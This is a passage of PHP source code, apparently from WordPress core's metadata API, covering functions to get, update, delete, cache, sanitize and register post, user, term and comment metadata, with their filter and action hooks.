* (blog, post, comment, term, user, or any other type with an associated meta table).
*
* Possible hook names include:
*
* - `deleted_blog_meta`
* - `deleted_post_meta`
* - `deleted_comment_meta`
* - `deleted_term_meta`
* - `deleted_user_meta`
*
* @since 2.9.0
*
* @param string[] $meta_ids An array of metadata entry IDs to delete.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param mixed $_meta_value Metadata value.
*/
do_action( "deleted_{$meta_type}_meta", $meta_ids, $object_id, $meta_key, $_meta_value );
// Old-style action.
if ( 'post' === $meta_type ) {
/**
* Fires immediately after deleting metadata for a post.
*
* @since 2.9.0
*
* @param string[] $meta_ids An array of metadata entry IDs to delete.
*/
do_action( 'deleted_postmeta', $meta_ids );
}
return true;
}
/**
* Retrieves the value of a metadata field for the specified object type and ID.
*
* If the meta field exists, a single value is returned if `$single` is true,
* or an array of values if it's false.
*
* If the meta field does not exist, the result depends on get_metadata_default().
* By default, an empty string is returned if `$single` is true, or an empty array
* if it's false.
*
* @since 2.9.0
*
* @see get_metadata_raw()
* @see get_metadata_default()
*
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Optional. Metadata key. If not specified, retrieve all metadata for
* the specified object. Default empty string.
* @param bool $single Optional. If true, return only the first value of the specified `$meta_key`.
* This parameter has no effect if `$meta_key` is not specified. Default false.
* @return mixed An array of values if `$single` is false.
* The value of the meta field if `$single` is true.
* False for an invalid `$object_id` (non-numeric, zero, or negative value),
* or if `$meta_type` is not specified.
* An empty array if a valid but non-existing object ID is passed and `$single` is false.
* An empty string if a valid but non-existing object ID is passed and `$single` is true.
* Note: Non-serialized values are returned as strings:
* - false values are returned as empty strings ('')
* - true values are returned as '1'
* - numbers (both integer and float) are returned as strings
* Arrays and objects retain their original type.
*/
function get_metadata( $meta_type, $object_id, $meta_key = '', $single = false ) {
$value = get_metadata_raw( $meta_type, $object_id, $meta_key, $single );
if ( ! is_null( $value ) ) {
return $value;
}
return get_metadata_default( $meta_type, $object_id, $meta_key, $single );
}
/**
* Retrieves raw metadata value for the specified object.
*
* @since 5.5.0
*
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Optional. Metadata key. If not specified, retrieve all metadata for
* the specified object. Default empty string.
* @param bool $single Optional. If true, return only the first value of the specified `$meta_key`.
* This parameter has no effect if `$meta_key` is not specified. Default false.
* @return mixed An array of values if `$single` is false.
* The value of the meta field if `$single` is true.
* False for an invalid `$object_id` (non-numeric, zero, or negative value),
* or if `$meta_type` is not specified.
* Null if the value does not exist.
*/
function get_metadata_raw( $meta_type, $object_id, $meta_key = '', $single = false ) {
if ( ! $meta_type || ! is_numeric( $object_id ) ) {
return false;
}
$object_id = absint( $object_id );
if ( ! $object_id ) {
return false;
}
/**
* Short-circuits the return value of a meta field.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
* Returning a non-null value will effectively short-circuit the function.
*
* Possible filter names include:
*
* - `get_blog_metadata`
* - `get_post_metadata`
* - `get_comment_metadata`
* - `get_term_metadata`
* - `get_user_metadata`
*
* @since 3.1.0
* @since 5.5.0 Added the `$meta_type` parameter.
*
* @param mixed $value The value to return, either a single metadata value or an array
* of values depending on the value of `$single`. Default null.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param bool $single Whether to return only the first value of the specified `$meta_key`.
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
*/
$check = apply_filters( "get_{$meta_type}_metadata", null, $object_id, $meta_key, $single, $meta_type );
if ( null !== $check ) {
if ( $single && is_array( $check ) ) {
return $check[0];
} else {
return $check;
}
}
$meta_cache = wp_cache_get( $object_id, $meta_type . '_meta' );
if ( ! $meta_cache ) {
$meta_cache = update_meta_cache( $meta_type, array( $object_id ) );
if ( isset( $meta_cache[ $object_id ] ) ) {
$meta_cache = $meta_cache[ $object_id ];
} else {
$meta_cache = null;
}
}
if ( ! $meta_key ) {
return $meta_cache;
}
if ( isset( $meta_cache[ $meta_key ] ) ) {
if ( $single ) {
return maybe_unserialize( $meta_cache[ $meta_key ][0] );
} else {
return array_map( 'maybe_unserialize', $meta_cache[ $meta_key ] );
}
}
return null;
}
/**
* Retrieves default metadata value for the specified meta key and object.
*
* By default, an empty string is returned if `$single` is true, or an empty array
* if it's false.
*
* @since 5.5.0
*
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param bool $single Optional. If true, return only the first value of the specified `$meta_key`.
* This parameter has no effect if `$meta_key` is not specified. Default false.
* @return mixed An array of default values if `$single` is false.
* The default value of the meta field if `$single` is true.
*/
function get_metadata_default( $meta_type, $object_id, $meta_key, $single = false ) {
if ( $single ) {
$value = '';
} else {
$value = array();
}
/**
* Filters the default metadata value for a specified meta key and object.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
*
* Possible filter names include:
*
* - `default_blog_metadata`
* - `default_post_metadata`
* - `default_comment_metadata`
* - `default_term_metadata`
* - `default_user_metadata`
*
* @since 5.5.0
*
* @param mixed $value The value to return, either a single metadata value or an array
* of values depending on the value of `$single`.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param bool $single Whether to return only the first value of the specified `$meta_key`.
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
*/
$value = apply_filters( "default_{$meta_type}_metadata", $value, $object_id, $meta_key, $single, $meta_type );
if ( ! $single && ! wp_is_numeric_array( $value ) ) {
$value = array( $value );
}
return $value;
}
/**
* Determines if a meta field with the given key exists for the given object ID.
*
* @since 3.3.0
*
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @return bool Whether a meta field with the given key exists.
*/
function metadata_exists( $meta_type, $object_id, $meta_key ) {
if ( ! $meta_type || ! is_numeric( $object_id ) ) {
return false;
}
$object_id = absint( $object_id );
if ( ! $object_id ) {
return false;
}
/** This filter is documented in wp-includes/meta.php */
$check = apply_filters( "get_{$meta_type}_metadata", null, $object_id, $meta_key, true, $meta_type );
if ( null !== $check ) {
return (bool) $check;
}
$meta_cache = wp_cache_get( $object_id, $meta_type . '_meta' );
if ( ! $meta_cache ) {
$meta_cache = update_meta_cache( $meta_type, array( $object_id ) );
$meta_cache = $meta_cache[ $object_id ];
}
if ( isset( $meta_cache[ $meta_key ] ) ) {
return true;
}
return false;
}
/**
* Retrieves metadata by meta ID.
*
* @since 3.3.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param int $meta_id ID for a specific meta row.
* @return stdClass|false {
* Metadata object, or boolean `false` if the metadata doesn't exist.
*
* @type string $meta_key The meta key.
* @type mixed $meta_value The unserialized meta value.
* @type string $meta_id Optional. The meta ID when the meta type is any value except 'user'.
* @type string $umeta_id Optional. The meta ID when the meta type is 'user'.
* @type string $blog_id Optional. The object ID when the meta type is 'blog'.
* @type string $post_id Optional. The object ID when the meta type is 'post'.
* @type string $comment_id Optional. The object ID when the meta type is 'comment'.
* @type string $term_id Optional. The object ID when the meta type is 'term'.
* @type string $user_id Optional. The object ID when the meta type is 'user'.
* }
*/
function get_metadata_by_mid( $meta_type, $meta_id ) {
global $wpdb;
if ( ! $meta_type || ! is_numeric( $meta_id ) || floor( $meta_id ) != $meta_id ) {
return false;
}
$meta_id = (int) $meta_id;
if ( $meta_id <= 0 ) {
return false;
}
$table = _get_meta_table( $meta_type );
if ( ! $table ) {
return false;
}
/**
* Short-circuits the return value when fetching a meta field by meta ID.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
* Returning a non-null value will effectively short-circuit the function.
*
* Possible hook names include:
*
* - `get_blog_metadata_by_mid`
* - `get_post_metadata_by_mid`
* - `get_comment_metadata_by_mid`
* - `get_term_metadata_by_mid`
* - `get_user_metadata_by_mid`
*
* @since 5.0.0
*
* @param stdClass|null $value The value to return.
* @param int $meta_id Meta ID.
*/
$check = apply_filters( "get_{$meta_type}_metadata_by_mid", null, $meta_id );
if ( null !== $check ) {
return $check;
}
$id_column = ( 'user' === $meta_type ) ? 'umeta_id' : 'meta_id';
$meta = $wpdb->get_row( $wpdb->prepare( "SELECT * FROM $table WHERE $id_column = %d", $meta_id ) );
if ( empty( $meta ) ) {
return false;
}
if ( isset( $meta->meta_value ) ) {
$meta->meta_value = maybe_unserialize( $meta->meta_value );
}
return $meta;
}
/**
* Updates metadata by meta ID.
*
* @since 3.3.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param int $meta_id ID for a specific meta row.
* @param string $meta_value Metadata value. Must be serializable if non-scalar.
* @param string|false $meta_key Optional. You can provide a meta key to update it. Default false.
* @return bool True on successful update, false on failure.
*/
function update_metadata_by_mid( $meta_type, $meta_id, $meta_value, $meta_key = false ) {
global $wpdb;
// Make sure everything is valid.
if ( ! $meta_type || ! is_numeric( $meta_id ) || floor( $meta_id ) != $meta_id ) {
return false;
}
$meta_id = (int) $meta_id;
if ( $meta_id <= 0 ) {
return false;
}
$table = _get_meta_table( $meta_type );
if ( ! $table ) {
return false;
}
$column = sanitize_key( $meta_type . '_id' );
$id_column = ( 'user' === $meta_type ) ? 'umeta_id' : 'meta_id';
/**
* Short-circuits updating metadata of a specific type by meta ID.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
* Returning a non-null value will effectively short-circuit the function.
*
* Possible hook names include:
*
* - `update_blog_metadata_by_mid`
* - `update_post_metadata_by_mid`
* - `update_comment_metadata_by_mid`
* - `update_term_metadata_by_mid`
* - `update_user_metadata_by_mid`
*
* @since 5.0.0
*
* @param null|bool $check Whether to allow updating metadata for the given type.
* @param int $meta_id Meta ID.
* @param mixed $meta_value Meta value. Must be serializable if non-scalar.
* @param string|false $meta_key Meta key, if provided.
*/
$check = apply_filters( "update_{$meta_type}_metadata_by_mid", null, $meta_id, $meta_value, $meta_key );
if ( null !== $check ) {
return (bool) $check;
}
// Fetch the meta and go on if it's found.
$meta = get_metadata_by_mid( $meta_type, $meta_id );
if ( $meta ) {
$original_key = $meta->meta_key;
$object_id = $meta->{$column};
/*
* If a new meta_key (last parameter) was specified, change the meta key,
* otherwise use the original key in the update statement.
*/
if ( false === $meta_key ) {
$meta_key = $original_key;
} elseif ( ! is_string( $meta_key ) ) {
return false;
}
$meta_subtype = get_object_subtype( $meta_type, $object_id );
// Sanitize the meta.
$_meta_value = $meta_value;
$meta_value = sanitize_meta( $meta_key, $meta_value, $meta_type, $meta_subtype );
$meta_value = maybe_serialize( $meta_value );
// Format the data query arguments.
$data = array(
'meta_key' => $meta_key,
'meta_value' => $meta_value,
);
// Format the where query arguments.
$where = array();
$where[ $id_column ] = $meta_id;
/** This action is documented in wp-includes/meta.php */
do_action( "update_{$meta_type}_meta", $meta_id, $object_id, $meta_key, $_meta_value );
if ( 'post' === $meta_type ) {
/** This action is documented in wp-includes/meta.php */
do_action( 'update_postmeta', $meta_id, $object_id, $meta_key, $meta_value );
}
// Run the update query, all fields in $data are %s, $where is a %d.
$result = $wpdb->update( $table, $data, $where, '%s', '%d' );
if ( ! $result ) {
return false;
}
// Clear the caches.
wp_cache_delete( $object_id, $meta_type . '_meta' );
/** This action is documented in wp-includes/meta.php */
do_action( "updated_{$meta_type}_meta", $meta_id, $object_id, $meta_key, $_meta_value );
if ( 'post' === $meta_type ) {
/** This action is documented in wp-includes/meta.php */
do_action( 'updated_postmeta', $meta_id, $object_id, $meta_key, $meta_value );
}
return true;
}
// And if the meta was not found.
return false;
}
/**
* Deletes metadata by meta ID.
*
* @since 3.3.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param int $meta_id ID for a specific meta row.
* @return bool True on successful delete, false on failure.
*/
function delete_metadata_by_mid( $meta_type, $meta_id ) {
global $wpdb;
// Make sure everything is valid.
if ( ! $meta_type || ! is_numeric( $meta_id ) || floor( $meta_id ) != $meta_id ) {
return false;
}
$meta_id = (int) $meta_id;
if ( $meta_id <= 0 ) {
return false;
}
$table = _get_meta_table( $meta_type );
if ( ! $table ) {
return false;
}
// Object and ID columns.
$column = sanitize_key( $meta_type . '_id' );
$id_column = ( 'user' === $meta_type ) ? 'umeta_id' : 'meta_id';
/**
* Short-circuits deleting metadata of a specific type by meta ID.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
* Returning a non-null value will effectively short-circuit the function.
*
* Possible hook names include:
*
* - `delete_blog_metadata_by_mid`
* - `delete_post_metadata_by_mid`
* - `delete_comment_metadata_by_mid`
* - `delete_term_metadata_by_mid`
* - `delete_user_metadata_by_mid`
*
* @since 5.0.0
*
* @param null|bool $delete Whether to allow metadata deletion of the given type.
* @param int $meta_id Meta ID.
*/
$check = apply_filters( "delete_{$meta_type}_metadata_by_mid", null, $meta_id );
if ( null !== $check ) {
return (bool) $check;
}
// Fetch the meta and go on if it's found.
$meta = get_metadata_by_mid( $meta_type, $meta_id );
if ( $meta ) {
$object_id = (int) $meta->{$column};
/** This action is documented in wp-includes/meta.php */
do_action( "delete_{$meta_type}_meta", (array) $meta_id, $object_id, $meta->meta_key, $meta->meta_value );
// Old-style action.
if ( 'post' === $meta_type || 'comment' === $meta_type ) {
/**
* Fires immediately before deleting post or comment metadata of a specific type.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta
* object type (post or comment).
*
* Possible hook names include:
*
* - `delete_postmeta`
* - `delete_commentmeta`
*
* @since 3.4.0
*
* @param int $meta_id ID of the metadata entry to delete.
*/
do_action( "delete_{$meta_type}meta", $meta_id );
}
// Run the query, will return true if deleted, false otherwise.
$result = (bool) $wpdb->delete( $table, array( $id_column => $meta_id ) );
// Clear the caches.
wp_cache_delete( $object_id, $meta_type . '_meta' );
/** This action is documented in wp-includes/meta.php */
do_action( "deleted_{$meta_type}_meta", (array) $meta_id, $object_id, $meta->meta_key, $meta->meta_value );
// Old-style action.
if ( 'post' === $meta_type || 'comment' === $meta_type ) {
/**
* Fires immediately after deleting post or comment metadata of a specific type.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta
* object type (post or comment).
*
* Possible hook names include:
*
* - `deleted_postmeta`
* - `deleted_commentmeta`
*
* @since 3.4.0
*
* @param int $meta_id Deleted metadata entry ID.
*/
do_action( "deleted_{$meta_type}meta", $meta_id );
}
return $result;
}
// Meta ID was not found.
return false;
}
/**
* Updates the metadata cache for the specified objects.
*
* @since 2.9.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param string|int[] $object_ids Array or comma delimited list of object IDs to update cache for.
* @return array|false Metadata cache for the specified objects, or false on failure.
*/
function update_meta_cache( $meta_type, $object_ids ) {
global $wpdb;
if ( ! $meta_type || ! $object_ids ) {
return false;
}
$table = _get_meta_table( $meta_type );
if ( ! $table ) {
return false;
}
$column = sanitize_key( $meta_type . '_id' );
if ( ! is_array( $object_ids ) ) {
$object_ids = preg_replace( '|[^0-9,]|', '', $object_ids );
$object_ids = explode( ',', $object_ids );
}
$object_ids = array_map( 'intval', $object_ids );
/**
* Short-circuits updating the metadata cache of a specific type.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
* Returning a non-null value will effectively short-circuit the function.
*
* Possible hook names include:
*
* - `update_blog_metadata_cache`
* - `update_post_metadata_cache`
* - `update_comment_metadata_cache`
* - `update_term_metadata_cache`
* - `update_user_metadata_cache`
*
* @since 5.0.0
*
* @param mixed $check Whether to allow updating the meta cache of the given type.
* @param int[] $object_ids Array of object IDs to update the meta cache for.
*/
$check = apply_filters( "update_{$meta_type}_metadata_cache", null, $object_ids );
if ( null !== $check ) {
return (bool) $check;
}
$cache_group = $meta_type . '_meta';
$non_cached_ids = array();
$cache = array();
$cache_values = wp_cache_get_multiple( $object_ids, $cache_group );
foreach ( $cache_values as $id => $cached_object ) {
if ( false === $cached_object ) {
$non_cached_ids[] = $id;
} else {
$cache[ $id ] = $cached_object;
}
}
if ( empty( $non_cached_ids ) ) {
return $cache;
}
// Get meta info.
$id_list = implode( ',', $non_cached_ids );
$id_column = ( 'user' === $meta_type ) ? 'umeta_id' : 'meta_id';
$meta_list = $wpdb->get_results( "SELECT $column, meta_key, meta_value FROM $table WHERE $column IN ($id_list) ORDER BY $id_column ASC", ARRAY_A );
if ( ! empty( $meta_list ) ) {
foreach ( $meta_list as $metarow ) {
$mpid = (int) $metarow[ $column ];
$mkey = $metarow['meta_key'];
$mval = $metarow['meta_value'];
// Force subkeys to be array type.
if ( ! isset( $cache[ $mpid ] ) || ! is_array( $cache[ $mpid ] ) ) {
$cache[ $mpid ] = array();
}
if ( ! isset( $cache[ $mpid ][ $mkey ] ) || ! is_array( $cache[ $mpid ][ $mkey ] ) ) {
$cache[ $mpid ][ $mkey ] = array();
}
// Add a value to the current pid/key.
$cache[ $mpid ][ $mkey ][] = $mval;
}
}
$data = array();
foreach ( $non_cached_ids as $id ) {
if ( ! isset( $cache[ $id ] ) ) {
$cache[ $id ] = array();
}
$data[ $id ] = $cache[ $id ];
}
wp_cache_add_multiple( $data, $cache_group );
return $cache;
}
/**
* Retrieves the queue for lazy-loading metadata.
*
* @since 4.5.0
*
* @return WP_Metadata_Lazyloader Metadata lazyloader queue.
*/
function wp_metadata_lazyloader() {
static $wp_metadata_lazyloader;
if ( null === $wp_metadata_lazyloader ) {
$wp_metadata_lazyloader = new WP_Metadata_Lazyloader();
}
return $wp_metadata_lazyloader;
}
/**
* Given a meta query, generates SQL clauses to be appended to a main query.
*
* @since 3.2.0
*
* @see WP_Meta_Query
*
* @param array $meta_query A meta query.
* @param string $type Type of meta.
* @param string $primary_table Primary database table name.
* @param string $primary_id_column Primary ID column name.
* @param object $context Optional. The main query object. Default null.
* @return string[]|false {
* Array containing JOIN and WHERE SQL clauses to append to the main query,
* or false if no table exists for the requested meta type.
*
* @type string $join SQL fragment to append to the main JOIN clause.
* @type string $where SQL fragment to append to the main WHERE clause.
* }
*/
function get_meta_sql( $meta_query, $type, $primary_table, $primary_id_column, $context = null ) {
$meta_query_obj = new WP_Meta_Query( $meta_query );
return $meta_query_obj->get_sql( $type, $primary_table, $primary_id_column, $context );
}
/**
* Retrieves the name of the metadata table for the specified object type.
*
* @since 2.9.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @return string|false Metadata table name, or false if no metadata table exists
*/
function _get_meta_table( $type ) {
global $wpdb;
$table_name = $type . 'meta';
if ( empty( $wpdb->$table_name ) ) {
return false;
}
return $wpdb->$table_name;
}
/**
* Determines whether a meta key is considered protected.
*
* @since 3.1.3
*
* @param string $meta_key Metadata key.
* @param string $meta_type Optional. Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table. Default empty string.
* @return bool Whether the meta key is considered protected.
*/
function is_protected_meta( $meta_key, $meta_type = '' ) {
$sanitized_key = preg_replace( "/[^\x20-\x7E\p{L}]/", '', $meta_key );
$protected = strlen( $sanitized_key ) > 0 && ( '_' === $sanitized_key[0] );
/**
* Filters whether a meta key is considered protected.
*
* @since 3.2.0
*
* @param bool $protected Whether the key is considered protected.
* @param string $meta_key Metadata key.
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
*/
return apply_filters( 'is_protected_meta', $protected, $meta_key, $meta_type );
}
/**
* Sanitizes meta value.
*
* @since 3.1.3
* @since 4.9.8 The `$object_subtype` parameter was added.
*
* @param string $meta_key Metadata key.
* @param mixed $meta_value Metadata value to sanitize.
* @param string $object_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param string $object_subtype Optional. The subtype of the object type. Default empty string.
* @return mixed Sanitized $meta_value.
*/
function sanitize_meta( $meta_key, $meta_value, $object_type, $object_subtype = '' ) {
if ( ! empty( $object_subtype ) && has_filter( "sanitize_{$object_type}_meta_{$meta_key}_for_{$object_subtype}" ) ) {
/**
* Filters the sanitization of a specific meta key of a specific meta type and subtype.
*
* The dynamic portions of the hook name, `$object_type`, `$meta_key`,
* and `$object_subtype`, refer to the metadata object type (blog, comment, post, term, or user),
* the meta key value, and the object subtype respectively.
*
* @since 4.9.8
*
* @param mixed $meta_value Metadata value to sanitize.
* @param string $meta_key Metadata key.
* @param string $object_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param string $object_subtype Object subtype.
*/
return apply_filters( "sanitize_{$object_type}_meta_{$meta_key}_for_{$object_subtype}", $meta_value, $meta_key, $object_type, $object_subtype );
}
/**
* Filters the sanitization of a specific meta key of a specific meta type.
*
* The dynamic portions of the hook name, `$meta_type`, and `$meta_key`,
* refer to the metadata object type (blog, comment, post, term, or user) and the meta
* key value, respectively.
*
* @since 3.3.0
*
* @param mixed $meta_value Metadata value to sanitize.
* @param string $meta_key Metadata key.
* @param string $object_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
*/
return apply_filters( "sanitize_{$object_type}_meta_{$meta_key}", $meta_value, $meta_key, $object_type );
}
/**
* Registers a meta key.
*
* It is recommended to register meta keys for a specific combination of object type and object subtype. If passing
* an object subtype is omitted, the meta key will be registered for the entire object type, however it can be partly
* overridden in case a more specific meta key of the same name exists for the same object type and a subtype.
*
* If an object type does not support any subtypes, such as blogs, users, or comments, you should commonly call this function
* without passing a subtype.
*
* @since 3.3.0
* @since 4.6.0 {@link https://core.trac.wordpress.org/ticket/35658 Modified
* to support an array of data to attach to registered meta keys}. Previous arguments for
* `$sanitize_callback` and `$auth_callback` have been folded into this array.
* @since 4.9.8 The `$object_subtype` argument was added to the arguments array.
* @since 5.3.0 Valid meta types expanded to include "array" and "object".
* @since 5.5.0 The `$default` argument was added to the arguments array.
* @since 6.4.0 The `$revisions_enabled` argument was added to the arguments array.
* @since 6.7.0 The `label` argument was added to the arguments array.
*
* @param string $object_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param string $meta_key Meta key to register.
* @param array $args {
* Data used to describe the meta key when registered.
*
* @type string $object_subtype A subtype; e.g. if the object type is "post", the post type. If left empty,
* the meta key will be registered on the entire object type. Default empty.
* @type string $type The type of data associated with this meta key.
* Valid values are 'string', 'boolean', 'integer', 'number', 'array', and 'object'.
* @type string $label A human-readable label of the data attached to this meta key.
* @type string $description A description of the data attached to this meta key.
* @type bool $single Whether the meta key has one value per object, or an array of values per object.
* @type mixed $default The default value returned from get_metadata() if no value has been set yet.
* When using a non-single meta key, the default value is for the first entry.
* In other words, when calling get_metadata() with `$single` set to `false`,
* the default value given here will be wrapped in an array.
* @type callable $sanitize_callback A function or method to call when sanitizing `$meta_key` data.
* @type callable $auth_callback Optional. A function or method to call when performing edit_post_meta,
* add_post_meta, and delete_post_meta capability checks.
* @type bool|array $show_in_rest Whether data associated with this meta key can be considered public and
* should be accessible via the REST API. A custom post type must also declare
* support for custom fields for registered meta to be accessible via REST.
* When registering complex meta values this argument may optionally be an
* array with 'schema' or 'prepare_callback' keys instead of a boolean.
* @type bool $revisions_enabled Whether to enable revisions support for this meta_key. Can only be used when the
* object type is 'post'.
* }
* @param string|array $deprecated Deprecated. Use `$args` instead.
* @return bool True if the meta key was successfully registered in the global array, false if not.
* Registering a meta key with distinct sanitize and auth callbacks will fire those callbacks,
* but will not add to the global registry.
*/
function register_meta( $object_type, $meta_key, $args, $deprecated = null ) {
global $wp_meta_keys;
if ( ! is_array( $wp_meta_keys ) ) {
$wp_meta_keys = array();
}
$defaults = array(
'object_subtype' => '',
'type' => 'string',
'label' => '',
'description' => '',
'default' => '',
'single' => false,
'sanitize_callback' => null,
'auth_callback' => null,
'show_in_rest' => false,
'revisions_enabled' => false,
);
// There used to be individual args for sanitize and auth callbacks.
$has_old_sanitize_cb = false;
$has_old_auth_cb = false;
if ( is_callable( $args ) ) {
$args = array(
'sanitize_callback' => $args,
);
$has_old_sanitize_cb = true;
} else {
$args = (array) $args;
}
if ( is_callable( $deprecated ) ) {
$args['auth_callback'] = $deprecated;
$has_old_auth_cb = true;
}
/**
* Filters the registration arguments when registering meta.
*
* @since 4.6.0
*
* @param array $args Array of meta registration arguments.
* @param array $defaults Array of default arguments.
* @param string $object_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param string $meta_key Meta key.
*/
$args = apply_filters( 'register_meta_args', $args, $defaults, $object_type, $meta_key );
unset( $defaults['default'] );
$args = wp_parse_args( $args, $defaults );
// Require an item schema when registering array meta.
if ( false !== $args['show_in_rest'] && 'array' === $args['type'] ) {
if ( ! is_array( $args['show_in_rest'] ) || ! isset( $args['show_in_rest']['schema']['items'] ) ) {
_doing_it_wrong( __FUNCTION__, __( 'When registering an "array" meta type to show in the REST API, you must specify the schema for each array item in "show_in_rest.schema.items".' ), '5.3.0' );
return false;
}
}
$object_subtype = ! empty( $args['object_subtype'] ) ? $args['object_subtype'] : '';
if ( $args['revisions_enabled'] ) {
if ( 'post' !== $object_type ) {
_doing_it_wrong( __FUNCTION__, __( 'Meta keys cannot enable revisions support unless the object type supports revisions.' ), '6.4.0' );
return false;
} elseif ( ! empty( $object_subtype ) && ! post_type_supports( $object_subtype, 'revisions' ) ) {
_doing_it_wrong( __FUNCTION__, __( 'Meta keys cannot enable revisions support unless the object subtype supports revisions.' ), '6.4.0' );
return false;
}
}
// If `auth_callback` is not provided, fall back to `is_protected_meta()`.
if ( empty( $args['auth_callback'] ) ) {
if ( is_protected_meta( $meta_key, $object_type ) ) {
$args['auth_callback'] = '__return_false';
} else {
$args['auth_callback'] = '__return_true';
}
}
// Back-compat: old sanitize and auth callbacks are applied to all of an object type.
if ( is_callable( $args['sanitize_callback'] ) ) {
if ( ! empty( $object_subtype ) ) {
add_filter( "sanitize_{$object_type}_meta_{$meta_key}_for_{$object_subtype}", $args['sanitize_callback'], 10, 4 );
} else {
add_filter( "sanitize_{$object_type}_meta_{$meta_key}", $args['sanitize_callback'], 10, 3 );
}
}
if ( is_callable( $args['auth_callback'] ) ) {
if ( ! empty( $object_subtype ) ) {
add_filter( "auth_{$object_type}_meta_{$meta_key}_for_{$object_subtype}", $args['auth_callback'], 10, 6 );
} else {
add_filter( "auth_{$object_type}_meta_{$meta_key}", $args['auth_callback'], 10, 6 );
}
}
if ( array_key_exists( 'default', $args ) ) {
$schema = $args;
if ( is_array( $args['show_in_rest'] ) && isset( $args['show_in_rest']['schema'] ) ) {
$schema = array_merge( $schema, $args['show_in_rest']['schema'] );
}
$check = rest_validate_value_from_schema( $args['default'], $schema );
if ( is_wp_error( $check ) ) {
_doing_it_wrong( __FUNCTION__, __( 'When registering a default meta value the data must match the type provided.' ), '5.5.0' );
return false;
}
if ( ! has_filter( "default_{$object_type}_metadata", 'filter_default_metadata' ) ) {
add_filter( "default_{$object_type}_metadata", 'filter_default_metadata', 10, 5 );
}
}
// Global registry only contains meta keys registered with the array of arguments added in 4.6.0.
if ( ! $has_old_auth_cb && ! $has_old_sanitize_cb ) {
unset( $args['object_subtype'] );
$wp_meta_keys[ $object_type ][ $object_subtype ][ $meta_key ] = $args;
return true;
}
return false;
}
/**
* Filters into default_{$object_type}_metadata and adds in default value.
*
* @since 5.5.0
*
* @param mixed $value Current value passed to filter.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param bool $single If true, return only the first value of the specified `$meta_key`.
* This parameter has no effect if `$meta_key` is not specified.
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @return mixed An array of default values if `$single` is false.
* The default value of the meta field if `$single` is true.
*/
function filter_default_metadata( $value, $object_id, $meta_key, $single, $meta_type ) {
global $wp_meta_keys;
if ( wp_installing() ) {
return $value;
}
if ( ! is_array( $wp_meta_keys ) || ! isset( $wp_meta_keys[ $meta_type ] ) ) {
return $value;
}
$defaults = array();
foreach ( $wp_meta_keys[ $meta_type ] as $sub_type => $meta_data ) {
foreach ( $meta_data as $_meta_key => $args ) {
if ( $_meta_key === $meta_key && array_key_exists( 'default', $args ) ) {
$defaults[ $sub_type ] = $args;
}
}
}
if ( ! $defaults ) {
return $value;
}
// If this meta type does not have subtypes, then the default is keyed as an empty string.
if ( isset( $defaults[''] ) ) {
$metadata = $defaults[''];
} else {
$sub_type = get_object_subtype( $meta_type, $object_id );
